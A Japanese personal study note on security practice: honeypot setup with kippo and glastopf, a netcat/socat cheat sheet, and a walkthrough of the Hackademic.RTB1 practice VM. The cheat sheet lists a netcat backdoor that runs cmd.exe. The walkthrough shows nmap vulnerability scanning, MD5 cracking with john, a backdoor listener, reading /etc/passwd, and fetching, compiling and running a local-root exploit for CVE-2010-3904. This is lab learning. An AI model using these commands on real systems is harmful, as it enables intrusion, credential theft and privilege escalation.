セキュリティについて



##最近やろうと思うセキュリティ関連の技術

まずは、こちらのブログを読む。

http://atani.github.io/

まず、ダミーサーバーを幾つか立ち上げて、それを自動作成、処理するスクリプトを書きたい。

ダミーサーバーというのは、作成自体は簡単で、Arch Linuxなどの最小構成のOS,systemd-nspawnを使い仮想上でuseraddして,chmod,chownを設定したり、/etc/sudoersでsudoを実行できなくしたりと、一切の権限を制限したアカウントを作成します。後は誘導とSSHで外部からアクセスできるようにしておくなど。

ダミーサーバーを設置した後は、システムログなどを見れた良いですが、ハニーポットツールを使うと良いです。SSHはkippo,Web Serverはglastopfが便利そう。

一応、ダミーサーバー意外は、Firewallを設定。具体的にはiptablesの例外を書けば良い。

##その他

まずは、こちらのブログを読む。

https://mrtc0.github.io/


echo server:$ nc -lp 25252
port scan:$ nc -v -z 192.168.1.107 1-80,$ nc -vv -z 192.168.1.107 80 22 443
banner:$ nc -vv 192.168.1.107 80
port fowerld:$ nc -lp 25252 -e 'nc sh.test 80
file upload:$ nc -lvp 25252 > test.txt
honey pot:$ nc -lvvp 80 < header.txt
backdoor:$ nc -v 192.168.1.107 25252, $ nc -lvp 25252 -e cmd.exe
option:$ --l, --ssl,
server: $ ncat --listen --ssl --ssl-cert test-cert.pem --ssl-key test-key.pem
client: $ ncat --ssl-verify --ssl-trustfile test-cert.pem


socatというものがあるらしい。


$ socat -v tcp-listen:8080,fork system:cat
$ ps aux | grep socat


portsnap, zfs, flavours, Jail.

malware-traffic-analysis.net, bro.

tor, scapy.

###Hackademic.RTB1


nmap

nmap -Pn -sV -p0-65535 -O -T 4 -v --script=vuln,default 192.168.1.113 > 192.168.1.113.nmap

cat 192.168.1.113.nmap


SQL Injection

python x.py > hash.txt


MD5 Decrypt

$ john --format=raw-md5 hash.txt --wordlist=~/Documents/wordlists/rockyou.txt

Upload Backdoor

nc -lvp 12345

$ cat /etc/passwd

権限昇格

$ uname -r

CVE-2010-3904

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3904

$ cd tmp/
$ curl -O https://www.exploit-db.com/download/15285
$ mv 15285 .x.c
$ gcc .x.c -o .x
$ ./.x